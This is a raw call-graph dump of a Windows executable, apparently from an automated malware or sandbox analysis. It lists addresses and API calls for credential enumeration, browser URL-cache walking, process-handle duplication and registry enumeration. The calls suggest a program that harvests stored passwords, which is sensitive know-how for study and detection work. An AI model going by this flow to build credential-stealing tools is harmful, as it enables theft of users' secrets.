37898->37899 37900 409bca GetModuleFileNameW 37899->37900 37900->37882 37903 4447f4 37901->37903 37902 40dc1b 37902->37885 37902->37886 37903->37902 37904 444807 ??2@YAPAXI 37903->37904 37905 44481f 37904->37905 37906 444873 _snwprintf 37905->37906 37907 4448ab wcscpy 37905->37907 37940 44474a 8 API calls 37906->37940 37909 4448bb 37907->37909 37941 44474a 8 API calls 37909->37941 37910 4448a7 37910->37907 37910->37909 37912 4448cd 37942 44474a 8 API calls 37912->37942 37914 4448e2 37943 44474a 8 API calls 37914->37943 37916 4448f7 37944 44474a 8 API calls 37916->37944 37918 44490c 37945 44474a 8 API calls 37918->37945 37920 444921 37946 44474a 8 API calls 37920->37946 37922 444936 37947 44474a 8 API calls 37922->37947 37924 44494b 37948 44474a 8 API calls 37924->37948 37926 444960 ??3@YAXPAX 37926->37902 37928 44db70 37927->37928 37929 40d702 memset GetPrivateProfileStringW 37928->37929 37930 40d752 37929->37930 37931 40d75c WritePrivateProfileStringW 37929->37931 37930->37931 37932 40d758 37930->37932 37931->37932 37932->37889 37934 44db70 37933->37934 37935 40da8d memset 37934->37935 37936 40daac LoadStringW 37935->37936 37937 40dac6 37936->37937 37937->37936 37939 40dade 37937->37939 37949 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37937->37949 37939->37715 37940->37910 37941->37912 37942->37914 37943->37916 37944->37918 37945->37920 37946->37922 37947->37924 37948->37926 37949->37937 37960 409b98 GetFileAttributesW 37950->37960 37952 40daea 37953 40daef wcscpy wcscpy GetPrivateProfileIntW 37952->37953 37959 40db63 37952->37959 37961 40d65d GetPrivateProfileStringW 37953->37961 37955 40db3e 37962 40d65d GetPrivateProfileStringW 37955->37962 37957 40db4f 37963 40d65d GetPrivateProfileStringW 37957->37963 37959->37716 37960->37952 37961->37955 37962->37957 37963->37959 37999 40eaff 37964->37999 37968 411ae2 memset 37967->37968 37969 411b8f 37967->37969 38040 409bca GetModuleFileNameW 37968->38040 37981 411a8b 37969->37981 37971 411b0a wcsrchr 37972 411b22 wcscat 37971->37972 37973 411b1f 37971->37973 38041 414770 wcscpy wcscpy wcscpy CloseHandle 37972->38041 37973->37972 37975 411b67 38042 402afb 37975->38042 37979 411b7f 38098 40ea13 SendMessageW memset SendMessageW 37979->38098 37982 402afb 27 API calls 37981->37982 37983 411ac0 37982->37983 37984 4110dc 37983->37984 37985 41113e 37984->37985 37990 4110f0 37984->37990 38123 40969c LoadCursorW SetCursor 37985->38123 37987 411143 38124 4032b4 37987->38124 38142 444a54 37987->38142 37988 4110f7 _wcsicmp 37988->37990 37989 411157 37991 40ada2 _wcsicmp 37989->37991 37990->37985 37990->37988 38145 410c46 10 API calls 37990->38145 37994 411167 37991->37994 37992 4111af 37994->37992 37995 4111a6 qsort 37994->37995 37995->37992 37998->37798 38000 40eb10 37999->38000 38013 40e8e0 38000->38013 38003 40eb6c memcpy memcpy 38004 40ebe1 38003->38004 38005 40ebb7 38003->38005 38004->38003 38006 40ebf2 ??2@YAPAXI ??2@YAPAXI 38004->38006 38005->38004 38007 40d134 16 API calls 38005->38007 38008 40ec2e ??2@YAPAXI 38006->38008 38011 40ec65 38006->38011 38007->38005 38008->38011 38023 40ea7f 38011->38023 38012 402f49 38012->37798 38014 40e8f2 38013->38014 38015 40e8eb ??3@YAXPAX 38013->38015 38016 40e900 38014->38016 38017 40e8f9 ??3@YAXPAX 38014->38017 38015->38014 38018 40e90a ??3@YAXPAX 38016->38018 38020 40e911 38016->38020 38017->38016 38018->38020 38019 40e931 ??2@YAPAXI ??2@YAPAXI 38019->38003 38020->38019 38021 40e921 ??3@YAXPAX 38020->38021 38022 40e92a ??3@YAXPAX 38020->38022 38021->38022 38022->38019 38024 40aa04 free 38023->38024 38025 40ea88 38024->38025 38026 40aa04 free 38025->38026 38027 40ea90 38026->38027 38028 40aa04 free 38027->38028 38029 40ea98 38028->38029 38030 40aa04 free 38029->38030 38031 40eaa0 38030->38031 38032 40a9ce 4 API calls 38031->38032 38033 40eab3 38032->38033 38034 40a9ce 4 API calls 38033->38034 38035 40eabd 38034->38035 38036 40a9ce 4 API calls 38035->38036 38037 40eac7 38036->38037 38038 40a9ce 4 API calls 38037->38038 38039 40ead1 38038->38039 38039->38012 38040->37971 38041->37975 38099 40b2cc 38042->38099 38044 402b0a 38045 40b2cc 27 API calls 38044->38045 38046 402b23 38045->38046 38047 40b2cc 27 API calls 38046->38047 38048 402b3a 38047->38048 38049 40b2cc 27 API calls 38048->38049 38050 402b54 38049->38050 38051 40b2cc 27 API calls 38050->38051 38052 402b6b 38051->38052 38053 40b2cc 27 API calls 38052->38053 38054 402b82 38053->38054 38055 40b2cc 27 API calls 38054->38055 38056 402b99 38055->38056 38057 40b2cc 27 API calls 38056->38057 38058 402bb0 38057->38058 38059 40b2cc 27 API calls 38058->38059 38060 402bc7 38059->38060 38061 40b2cc 27 API calls 38060->38061 38062 402bde 38061->38062 38063 40b2cc 27 API calls 38062->38063 38064 402bf5 38063->38064 38065 40b2cc 27 API calls 38064->38065 38066 402c0c 38065->38066 38067 40b2cc 27 API calls 38066->38067 38068 402c23 38067->38068 38069 40b2cc 27 API calls 38068->38069 38070 402c3a 38069->38070 38071 40b2cc 27 API calls 38070->38071 38072 402c51 38071->38072 38073 40b2cc 27 API calls 38072->38073 38074 402c68 38073->38074 38075 40b2cc 27 API calls 38074->38075 38076 402c7f 38075->38076 38077 40b2cc 27 API calls 38076->38077 38078 402c99 38077->38078 38079 40b2cc 27 API calls 38078->38079 38080 402cb3 38079->38080 38081 40b2cc 27 API calls 38080->38081 38082 402cd5 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402cf0 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402d0b 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402d26 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402d3e 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402d59 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402d78 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402d93 38095->38096 38097 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38096->38097 38097->37979 38098->37969 38102 40b58d 38099->38102 38101 40b2d1 38101->38044 38103 40b5a4 GetModuleHandleW FindResourceW 38102->38103 38104 40b62e 38102->38104 38105 40b5c2 LoadResource 38103->38105 38107 40b5e7 38103->38107 38104->38101 38106 40b5d0 SizeofResource LockResource 38105->38106 38105->38107 38106->38107 38107->38104 38115 40afcf 38107->38115 38109 40b608 memcpy 38118 40b4d3 memcpy 38109->38118 38111 40b61e 38119 40b3c1 18 API calls 38111->38119 38113 40b626 38120 40b04b 38113->38120 38116 40b04b ??3@YAXPAX 38115->38116 38117 40afd7 ??2@YAPAXI 38116->38117 38117->38109 38118->38111 38119->38113 38121 40b051 ??3@YAXPAX 38120->38121 38122 40b05f 38120->38122 38121->38122 38122->38104 38123->37987 38125 4032c4 38124->38125 38126 40b633 free 38125->38126 38127 403316 38126->38127 38146 44553b 38127->38146 38131 403480 38344 40368c 15 API calls 38131->38344 38133 403489 38134 40b633 free 38133->38134 38135 403495 38134->38135 38135->37989 38136 4033a9 memset memcpy 38137 4033ec wcscmp 38136->38137 38138 40333c 38136->38138 38137->38138 38138->38131 38138->38136 38138->38137 38342 4028e7 11 API calls 38138->38342 38343 40f508 6 API calls 38138->38343 38141 403421 _wcsicmp 38141->38138 38143 444a64 FreeLibrary 38142->38143 38144 444a83 38142->38144 38143->38144 38144->37989 38145->37990 38147 445548 38146->38147 38148 445599 38147->38148 38345 40c768 38147->38345 38149 4455a8 memset 38148->38149 38157 4457f2 38148->38157 38428 403988 38149->38428 38155 4455e5 38170 445672 38155->38170 38175 44560f 38155->38175 38160 445854 38157->38160 38530 403e2d memset memset memset memset memset 38157->38530 38158 4458bb memset memset 38162 414c2e 14 API calls 38158->38162 38204 4458aa 38160->38204 38553 403c9c memset memset memset memset memset 38160->38553 38161 44595e memset memset 38165 414c2e 14 API calls 38161->38165 38166 4458f9 38162->38166 38164 445a00 memset memset 38576 414c2e 38164->38576 38173 44599c 38165->38173 38174 40b2cc 27 API calls 38166->38174 38167 44558c 38412 444b06 38167->38412 38168 44557a 38168->38167 38623 4136c0 CoTaskMemFree 38168->38623 38439 403fbe memset memset memset memset memset 38170->38439 38183 40b2cc 27 API calls 38173->38183 38184 445909 38174->38184 38186 4087b3 337 API calls 38175->38186 38177 445bca 38185 445c8b memset memset 38177->38185 38241 445cf0 38177->38241 38178 445b38 memset memset memset 38189 445bd4 38178->38189 38190 445b98 38178->38190 38179 445849 38639 40b1ab free free 38179->38639 38198 4459ac 38183->38198 38195 409d1f 6 API calls 38184->38195 38199 414c2e 14 API calls 38185->38199 38196 445621 38186->38196 38187 445585 38624 41366b FreeLibrary 38187->38624 38188 44589f 38640 40b1ab free free 38188->38640 38193 414c2e 14 API calls 38189->38193 38190->38189 38201 445ba2 38190->38201 38191 40b2cc 27 API calls 38203 445a4f 38191->38203 38206 445be2 38193->38206 38194 403335 38341 4452e5 45 API calls 38194->38341 38209 445919 38195->38209 38625 4454bf 20 API calls 38196->38625 38197 445823 38197->38179 38219 4087b3 337 API calls 38197->38219 38210 409d1f 6 API calls 38198->38210 38211 445cc9 38199->38211 38710 4099c6 wcslen 38201->38710 38202 4456b2 38627 40b1ab free free 38202->38627 38589 409d1f wcslen wcslen 38203->38589 38204->38158 38238 44594a 38204->38238 38217 40b2cc 27 API calls 38206->38217 38207 445d3d 38237 40b2cc 27 API calls 38207->38237 38208 445d88 memset memset memset 38220 414c2e 14 API calls 38208->38220 38641 409b98 GetFileAttributesW 38209->38641 38221 4459bc 38210->38221 38222 409d1f 6 API calls 38211->38222 38212 445879 38212->38188 38223 4087b3 337 API calls 38212->38223 38214 445bb3 38713 445403 memset 38214->38713 38215 445680 38215->38202 38462 4087b3 memset 38215->38462 38226 445bf3 38217->38226 38219->38197 38229 445dde 38220->38229 38706 409b98 GetFileAttributesW 38221->38706 38231 445ce1 38222->38231 38223->38212 38236 409d1f 6 API calls 38226->38236 38227 445928 38227->38238 38642 40b6ef 38227->38642 38239 40b2cc 27 API calls 38229->38239 38730 409b98 GetFileAttributesW 38231->38730 38235 40b2cc 27 API calls 38243 445a94 38235->38243 38245 445c07 38236->38245 38246 445d54 _wcsicmp 38237->38246 38238->38161 38250 4459ed 38238->38250 38249 445def 38239->38249 38240 4459cb 38240->38250 38257 40b6ef 249 API calls 38240->38257 38241->38194 38241->38207 38241->38208 38242 445389 255 API calls 38242->38177 38594 40ae18 38243->38594 38244 44566d 38244->38157 38513 413d4c 38244->38513 38253 445389 255 API calls 38245->38253 38254 445d71 38246->38254 38318 445d67 38246->38318 38248 445665 38626 40b1ab free free 38248->38626 38255 409d1f 6 API calls 38249->38255 38250->38164 38291 445b22 38250->38291 38259 445c17 38253->38259 38731 445093 23 API calls 38254->38731 38262 445e03 38255->38262 38257->38250 38258 4456d8 38264 40b2cc 27 API calls 38258->38264 38265 40b2cc 27 API calls 38259->38265 38261 44563c 38261->38248 38267 4087b3 337 API calls 38261->38267 38732 409b98 GetFileAttributesW 38262->38732 38263 40b6ef 249 API calls 38263->38194 38269 4456e2 38264->38269 38270 445c23 38265->38270 38266 445d83 38266->38194 38267->38261 38628 413fa6 _wcsicmp _wcsicmp 38269->38628 38274 409d1f 6 API calls 38270->38274 38272 445e12 38279 445e6b 38272->38279 38286 40b2cc 27 API calls 38272->38286 38277 445c37 38274->38277 38275 445aa1 38278 445b17 38275->38278 38295 445ab2 memset 38275->38295 38309 409d1f 6 API calls 38275->38309 38601 40add4 38275->38601 38606 445389 38275->38606 38615 40ae51 38275->38615 38276 4456eb 38282 4456fd memset memset memset memset 38276->38282 38283 4457ea 38276->38283 38284 445389 255 API calls 38277->38284 38707 40aebe 38278->38707 38734 445093 23 API calls 38279->38734 38629 409c70 wcscpy wcsrchr 38282->38629 38632 413d29 38283->38632 38290 445c47 38284->38290 38292 445e33 38286->38292 38288 445e7e 38294 445f67 38288->38294 38297 40b2cc 27 API calls 38290->38297 38291->38177 38291->38178 38293 409d1f 6 API calls 38292->38293 38298 445e47 38293->38298 38299 40b2cc 27 API calls 38294->38299 38300 40b2cc 27 API calls 38295->38300 38302 445c53 38297->38302 38733 409b98 GetFileAttributesW 38298->38733 38304 445f73 38299->38304 38300->38275 38301 409c70 2 API calls 38305 44577e 38301->38305 38306 409d1f 6 API calls 38302->38306 38308 409d1f 6 API calls 38304->38308 38310 409c70 2 API calls 38305->38310 38311 445c67 38306->38311 38307 445e56 38307->38279 38315 445e83 memset 38307->38315 38312 445f87 38308->38312 38309->38275 38313 44578d 38310->38313 38314 445389 255 API calls 38311->38314 38737 409b98 GetFileAttributesW 38312->38737 38313->38283 38320 40b2cc 27 API calls 38313->38320 38314->38177 38319 40b2cc 27 API calls 38315->38319 38318->38194 38318->38263 38321 445eab 38319->38321 38322 4457a8 38320->38322 38323 409d1f 6 API calls 38321->38323 38324 409d1f 6 API calls 38322->38324 38325 445ebf 38323->38325 38326 4457b8 38324->38326 38327 40ae18 9 API calls 38325->38327 38631 409b98 GetFileAttributesW 38326->38631 38337 445ef5 38327->38337 38329 4457c7 38329->38283 38330 4087b3 337 API calls 38329->38330 38330->38283 38331 40ae51 9 API calls 38331->38337 38332 445f5c 38333 40aebe FindClose 38332->38333 38333->38294 38334 40add4 2 API calls 38334->38337 38335 40b2cc 27 API calls 38335->38337 38336 409d1f 6 API calls 38336->38337 38337->38331 38337->38332 38337->38334 38337->38335 38337->38336 38339 445f3a 38337->38339 38735 409b98 GetFileAttributesW 38337->38735 38736 445093 23 API calls 38339->38736 38341->38138 38342->38141 38343->38138 38344->38133 38346 40c775 38345->38346 38738 40b1ab free free 38346->38738 38348 40c788 38739 40b1ab free free 38348->38739 38350 40c790 38740 40b1ab free free 38350->38740 38352 40c798 38353 40aa04 free 38352->38353 38354 40c7a0 38353->38354 38741 40c274 memset 38354->38741 38359 40a8ab 9 API calls 38360 40c7c3 38359->38360 38361 40a8ab 9 API calls 38360->38361 38362 40c7d0 38361->38362 38770 40c3c3 38362->38770 38366 40c877 38375 40bdb0 38366->38375 38367 40c86c 38796 4053fe 39 API calls 38367->38796 38370 40c813 _wcslwr 38794 40c634 49 API calls 38370->38794 38372 40c829 wcslen 38373 40c7e5 38372->38373 38373->38366 38373->38367 38793 40a706 wcslen memcpy 38373->38793 38795 40c634 49 API calls 38373->38795 38978 404363 38375->38978 38379 40bdee 38382 40b2cc 27 API calls 38379->38382 38384 40bf5d 38379->38384 38380 40bddf CredEnumerateW 38380->38379 38383 40be02 wcslen 38382->38383 38383->38384 38391 40be1e 38383->38391 38998 40440c 38384->38998 38385 40be26 wcsncmp 38385->38391 38388 40be7d memset 38389 40bea7 memcpy 38388->38389 38388->38391 38390 40bf11 wcschr 38389->38390 38389->38391 38390->38391 38391->38384 38391->38385 38391->38388 38391->38389 38391->38390 38392 40b2cc 27 API calls 38391->38392 38394 40bf43 LocalFree 38391->38394 39001 40bd5d 28 API calls 38391->39001 39002 404423 38391->39002 38393 40bef6 _wcsnicmp 38392->38393 38393->38390 38393->38391 38394->38391 38395 4135f7 39015 4135e0 38395->39015 38398 40b2cc 27 API calls 38399 41360d 38398->38399 38400 40a804 8 API calls 38399->38400 38401 413613 38400->38401 38402 41361b 38401->38402 38403 41363e 38401->38403 38405 40b273 27 API calls 38402->38405 38404 4135e0 FreeLibrary 38403->38404 38406 413643 38404->38406 38407 413625 GetProcAddress 38405->38407 38406->38168 38407->38403 38408 413648 38407->38408 38409 413658 38408->38409 38410 4135e0 FreeLibrary 38408->38410 38409->38168 38411 413666 38410->38411 38411->38168 39018 4449b9 38412->39018 38415 444c1f 38415->38148 38416 4449b9 42 API calls 38418 444b4b 38416->38418 38417 444c15 38419 4449b9 42 API calls 38417->38419 38418->38417 39039 444972 GetVersionExW 38418->39039 38419->38415 38421 444b99 memcmp 38426 444b8c 38421->38426 38422 444c0b 39043 444a85 42 API calls 38422->39043 38426->38421 38426->38422 39040 444aa5 42 API calls 38426->39040 39041 40a7a0 GetVersionExW 38426->39041 39042 444a85 42 API calls 38426->39042 38429 40399d 38428->38429 39044 403a16 38429->39044 38431 403a09 39058 40b1ab free free 38431->39058 38433 4039a3 38433->38431 38437 4039f4 38433->38437 39055 40a02c CreateFileW 38433->39055 38434 403a12 wcsrchr 38434->38155 38437->38431 38438 4099c6 2 API calls 38437->38438 38438->38431 38440 414c2e 14 API calls 38439->38440 38441 404048 38440->38441 38442 414c2e 14 API calls 38441->38442 38443 404056 38442->38443 38444 409d1f 6 API calls 38443->38444 38445 404073 38444->38445 38446 409d1f 6 API calls 38445->38446 38447 40408e 38446->38447 38448 409d1f 6 API calls 38447->38448 38449 4040a6 38448->38449 38450 403af5 20 API calls 38449->38450 38451 4040ba 38450->38451 38452 403af5 20 API calls 38451->38452 38453 4040cb 38452->38453 39085 40414f memset 38453->39085 38455 4040e0 38456 404140 38455->38456 38458 4040ec memset 38455->38458 38460 4099c6 2 API calls 38455->38460 38461 40a8ab 9 API calls 38455->38461 39099 40b1ab free free 38456->39099 38458->38455 38459 404148 38459->38215 38460->38455 38461->38455 39112 40a6e6 WideCharToMultiByte 38462->39112 38464 4087ed 39113 4095d9 memset 38464->39113 38467 408809 memset memset memset memset memset 38468 40b2cc 27 API calls 38467->38468 38469 4088a1 38468->38469 38470 409d1f 6 API calls 38469->38470 38471 4088b1 38470->38471 38472 40b2cc 27 API calls 38471->38472 38473 4088c0 38472->38473 38474 409d1f 6 API calls 38473->38474 38475 4088d0 38474->38475 38476 40b2cc 27 API calls 38475->38476 38477 4088df 38476->38477 38478 409d1f 6 API calls 38477->38478 38479 4088ef 38478->38479 38480 40b2cc 27 API calls 38479->38480 38481 4088fe 38480->38481 38482 409d1f 6 API calls 38481->38482 38483 40890e 38482->38483 38484 40b2cc 27 API calls 38483->38484 38485 40891d 38484->38485 38486 409d1f 6 API calls 38485->38486 38487 40892d 38486->38487 39132 409b98 GetFileAttributesW 38487->39132 38489 40893e 38490 408943 38489->38490 38491 408958 38489->38491 39133 407fdf 75 API calls 38490->39133 39134 409b98 GetFileAttributesW 38491->39134 38494 408964 38495 408969 38494->38495 38496 40897b 38494->38496 39135 4082c7 198 API calls 38495->39135 39136 409b98 GetFileAttributesW 38496->39136 38499 408987 38511 408953 38511->38215 38514 40b633 free 38513->38514 38515 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38514->38515 38516 413f00 Process32NextW 38515->38516 38517 413da5 OpenProcess 38516->38517 38518 413f17 CloseHandle 38516->38518 38519 413df3 memset 38517->38519 38522 413eb0 38517->38522 38518->38258 39412 413f27 38519->39412 38521 413ebf free 38521->38522 38522->38516 38522->38521 38523 4099f4 3 API calls 38522->38523 38523->38522 38524 413e37 GetModuleHandleW 38526 413e46 GetProcAddress 38524->38526 38527 413e1f 38524->38527 38526->38527 38527->38524 39417 413959 38527->39417 39433 413ca4 38527->39433 38529 413ea2 CloseHandle 38529->38522 38531 414c2e 14 API calls 38530->38531 38532 403eb7 38531->38532 38533 414c2e 14 API calls 38532->38533 38534 403ec5 38533->38534 38535 409d1f 6 API calls 38534->38535 38536 403ee2 38535->38536 38537 409d1f 6 API calls 38536->38537 38538 403efd 38537->38538 38539 409d1f 6 API calls 38538->38539 38540 403f15 38539->38540 38541 403af5 20 API calls 38540->38541 38542 403f29 38541->38542 38543 403af5 20 API calls 38542->38543 38544 403f3a 38543->38544 38545 40414f 33 API calls 38544->38545 38546 403f4f 38545->38546 38547 403faf 38546->38547 38549 403f5b memset 38546->38549 38551 4099c6 2 API calls 38546->38551 38552 40a8ab 9 API calls 38546->38552 39447 40b1ab free free 38547->39447 38549->38546 38550 403fb7 38550->38197 38551->38546 38552->38546 38554 414c2e 14 API calls 38553->38554 38555 403d26 38554->38555 38556 414c2e 14 API calls 38555->38556 38557 403d34 38556->38557 38558 409d1f 6 API calls 38557->38558 38559 403d51 38558->38559 38560 409d1f 6 API calls 38559->38560 38561 403d6c 38560->38561 38562 409d1f 6 API calls 38561->38562 38563 403d84 38562->38563 38564 403af5 20 API calls 38563->38564 38565 403d98 38564->38565 38566 403af5 20 API calls 38565->38566 38567 403da9 38566->38567 38568 40414f 33 API calls 38567->38568 38574 403dbe 38568->38574 38569 403e1e 39448 40b1ab free free 38569->39448 38570 403dca memset 38570->38574 38572 403e26 38572->38212 38573 4099c6 2 API calls 38573->38574 38574->38569 38574->38570 38574->38573 38575 40a8ab 9 API calls 38574->38575 38575->38574 38577 414b81 9 API calls 38576->38577 38578 414c40 38577->38578 38579 414c73 memset 38578->38579 39449 409cea 38578->39449 38583 414c94 38579->38583 38582 414c64 38582->38191 38584 414cf4 wcscpy 38583->38584 39452 414bb0 wcscpy 38583->39452 38584->38582 38586 414cd2 39453 4145ac RegQueryValueExW 38586->39453 38588 414ce9 38588->38584 38590 409d62 38589->38590 38591 409d43 wcscpy 38589->38591 38590->38235 38592 409719 2 API calls 38591->38592 38593 409d51 wcscat 38592->38593 38593->38590 38595 40aebe FindClose 38594->38595 38596 40ae21 38595->38596 38597 4099c6 2 API calls 38596->38597 38598 40ae35 38597->38598 38599 409d1f 6 API calls 38598->38599 38600 40ae49 38599->38600 38600->38275 38602 40ade0 38601->38602 38603 40ae0f 38601->38603 38602->38603 38604 40ade7 wcscmp 38602->38604 38603->38275 38604->38603 38605 40adfe wcscmp 38604->38605 38605->38603 38607 40ae18 9 API calls 38606->38607 38609 4453c4 38607->38609 38608 40ae51 9 API calls 38608->38609 38609->38608 38610 4453f3 38609->38610 38611 40add4 2 API calls 38609->38611 38614 445403 250 API calls 38609->38614 38612 40aebe FindClose 38610->38612 38611->38609 38613 4453fe 38612->38613 38613->38275 38614->38609 38616 40ae7b FindNextFileW 38615->38616 38617 40ae5c FindFirstFileW 38615->38617 38618 40ae94 38616->38618 38619 40ae8f 38616->38619 38617->38618 38621 40aeb6 38618->38621 38622 409d1f 6 API calls 38618->38622 38620 40aebe FindClose 38619->38620 38620->38618 38621->38275 38622->38621 38623->38187 38624->38167 38625->38261 38626->38244 38627->38244 38628->38276 38630 409c89 38629->38630 38630->38301 38631->38329 38633 413d39 38632->38633 38634 413d2f FreeLibrary 38632->38634 38635 40b633 free 38633->38635 38634->38633 38636 413d42 38635->38636 38637 40b633 free 38636->38637 38638 413d4a 38637->38638 38638->38157 38639->38160 38640->38204 38641->38227 38643 44db70 38642->38643 38644 40b6fc memset 38643->38644 38645 409c70 2 API calls 38644->38645 38646 40b732 wcsrchr 38645->38646 38647 40b743 38646->38647 38648 40b746 memset 38646->38648 38647->38648 38649 40b2cc 27 API calls 38648->38649 38650 40b76f 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 40b783 38651->38652 39454 409b98 GetFileAttributesW 38652->39454 38654 40b792 38655 40b7c2 38654->38655 38657 409c70 2 API calls 38654->38657 39455 40bb98 38655->39455 38659 40b7a5 38657->38659 38662 40b2cc 27 API calls 38659->38662 38660 40b837 CloseHandle 38665 40b83e memset 38660->38665 38661 40b817 39489 409a45 GetTempPathW 38661->39489 38663 40b7b2 38662->38663 38666 409d1f 6 API calls 38663->38666 39488 40a6e6 WideCharToMultiByte 38665->39488 38666->38655 38667 40b827 38667->38665 38669 40b866 38670 444432 120 API calls 38669->38670 38671 40b879 38670->38671 38672 40b273 27 API calls 38671->38672 38673 40bad5 38671->38673 38674 40b89a 38672->38674 38675 40b04b ??3@YAXPAX 38673->38675 38676 438552 133 API calls 38674->38676 38677 40baf3 38675->38677 38678 40b8a4 38676->38678 38677->38238 38679 40bacd 38678->38679 38681 4251c4 136 API calls 38678->38681 38680 443d90 110 API calls 38679->38680 38680->38673 38704 40b8b8 38681->38704 38682 40bac6 39501 424f26 122 API calls 38682->39501 38683 40b8bd memset 39492 425413 17 API calls 38683->39492 38686 425413 17 API calls 38686->38704 38689 40a71b MultiByteToWideChar 38689->38704 38690 40a734 MultiByteToWideChar 38690->38704 38693 40b9b5 memcmp 38693->38704 38694 4099c6 2 API calls 38694->38704 38695 404423 37 API calls 38695->38704 38698 4251c4 136 API calls 38698->38704 38699 40bb3e memset memcpy 39502 40a734 MultiByteToWideChar 38699->39502 38701 40bb88 LocalFree 38701->38704 38704->38682 38704->38683 38704->38686 38704->38689 38704->38690 38704->38693 38704->38694 38704->38695 38704->38698 38704->38699 38705 40ba5f memcmp 38704->38705 39493 4253ef 16 API calls 38704->39493 39494 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38704->39494 39495 4253af 17 API calls 38704->39495 39496 4253cf 17 API calls 38704->39496 39497 447280 memset 38704->39497 39498 447960 memset memcpy memcpy memcpy 38704->39498 39499 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38704->39499 39500 447920 memcpy memcpy memcpy 38704->39500 38705->38704 38706->38240 38708 40aed1 38707->38708 38709 40aec7 FindClose 38707->38709 38708->38291 38709->38708 38711 4099d7 38710->38711 38712 4099da memcpy 38710->38712 38711->38712 38712->38214 38714 40b2cc 27 API calls 38713->38714 38715 44543f 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 44544f 38716->38717 39594 409b98 GetFileAttributesW 38717->39594 38719 44545e 38720 445476 38719->38720 38722 40b6ef 249 API calls 38719->38722 38721 40b2cc 27 API calls 38720->38721 38723 445482 38721->38723 38722->38720 38724 409d1f 6 API calls 38723->38724 38725 445492 38724->38725 39595 409b98 GetFileAttributesW 38725->39595 38727 4454a1 38728 4454b9 38727->38728 38729 40b6ef 249 API calls 38727->38729 38728->38242 38729->38728 38730->38241 38731->38266 38732->38272 38733->38307 38734->38288 38735->38337 38736->38337 38737->38318 38738->38348 38739->38350 38740->38352 38742 414c2e 14 API calls 38741->38742 38743 40c2ae 38742->38743 38797 40c1d3 38743->38797 38748 40c3be 38765 40a8ab 38748->38765 38749 40afcf 2 API calls 38750 40c2fd FindFirstUrlCacheEntryW 38749->38750 38751 40c3b6 38750->38751 38752 40c31e wcschr 38750->38752 38753 40b04b ??3@YAXPAX 38751->38753 38754 40c331 38752->38754 38755 40c35e FindNextUrlCacheEntryW 38752->38755 38753->38748 38757 40a8ab 9 API calls 38754->38757 38755->38752 38756 40c373 GetLastError 38755->38756 38758 40c3ad FindCloseUrlCache 38756->38758 38759 40c37e 38756->38759 38760 40c33e wcschr 38757->38760 38758->38751 38761 40afcf 2 API calls 38759->38761 38760->38755 38762 40c34f 38760->38762 38763 40c391 FindNextUrlCacheEntryW 38761->38763 38764 40a8ab 9 API calls 38762->38764 38763->38752 38763->38758 38764->38755 38913 40a97a 38765->38913 38768 40a8cc 38768->38359 38769 40a8d0 7 API calls 38769->38768 38918 40b1ab free free 38770->38918 38772 40c3dd 38773 40b2cc 27 API calls 38772->38773 38774 40c3e7 38773->38774 38775 40c50e 38774->38775 38776 40c3ff 38774->38776 38790 405337 38775->38790 38777 40a9ce 4 API calls 38776->38777 38778 40c418 memset 38777->38778 38919 40aa1d 38778->38919 38781 40c471 38783 40c47a _wcsupr 38781->38783 38782 40c505 38782->38775 38784 40a8d0 7 API calls 38783->38784 38785 40c498 38784->38785 38786 40a8d0 7 API calls 38785->38786 38787 40c4ac memset 38786->38787 38788 40aa1d 38787->38788 38789 40c4e4 RegEnumValueW 38788->38789 38789->38782 38789->38783 38921 405220 38790->38921 38793->38370 38794->38372 38795->38373 38796->38366 38798 40ae18 9 API calls 38797->38798 38804 40c210 38798->38804 38799 40ae51 9 API calls 38799->38804 38800 40c264 38801 40aebe FindClose 38800->38801 38803 40c26f 38801->38803 38802 40add4 2 API calls 38802->38804 38809 40e5ed memset memset 38803->38809 38804->38799 38804->38800 38804->38802 38805 40c231 _wcsicmp 38804->38805 38806 40c1d3 34 API calls 38804->38806 38805->38804 38807 40c248 38805->38807 38806->38804 38822 40c084 21 API calls 38807->38822 38810 414c2e 14 API calls 38809->38810 38811 40e63f 38810->38811 38812 409d1f 6 API calls 38811->38812 38813 40e658 38812->38813 38823 409b98 GetFileAttributesW 38813->38823 38815 40e667 38816 409d1f 6 API calls 38815->38816 38818 40e680 38815->38818 38816->38818 38824 409b98 GetFileAttributesW 38818->38824 38819 40e68f 38820 40c2d8 38819->38820 38825 40e4b2 38819->38825 38820->38748 38820->38749 38822->38804 38823->38815 38824->38819 38846 40e01e 38825->38846 38827 40e593 38828 40e5b0 38827->38828 38829 40e59c DeleteFileW 38827->38829 38830 40b04b ??3@YAXPAX 38828->38830 38829->38828 38832 40e5bb 38830->38832 38831 40e521 38831->38827 38869 40e175 38831->38869 38834 40e5c4 CloseHandle 38832->38834 38835 40e5cc 38832->38835 38834->38835 38837 40b633 free 38835->38837 38836 40e573 38839 40e584 38836->38839 38840 40e57c CloseHandle 38836->38840 38838 40e5db 38837->38838 38842 40b633 free 38838->38842 38912 40b1ab free free 38839->38912 38840->38839 38841 40e540 38841->38836 38889 40e2ab 38841->38889 38844 40e5e3 38842->38844 38844->38820 38847 406214 22 API calls 38846->38847 38848 40e03c 38847->38848 38849 40e16b 38848->38849 38850 40dd85 74 API calls 38848->38850 38849->38831 38851 40e06b 38850->38851 38851->38849 38852 40afcf ??2@YAPAXI ??3@YAXPAX 38851->38852 38853 40e08d OpenProcess 38852->38853 38854 40e0a4 GetCurrentProcess DuplicateHandle 38853->38854 38858 40e152 38853->38858 38855 40e0d0 GetFileSize 38854->38855 38856 40e14a CloseHandle 38854->38856 38859 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38855->38859 38856->38858 38857 40e160 38861 40b04b ??3@YAXPAX 38857->38861 38858->38857 38860 406214 22 API calls 38858->38860 38862 40e0ea 38859->38862 38860->38857 38861->38849 38863 4096dc CreateFileW 38862->38863 38864 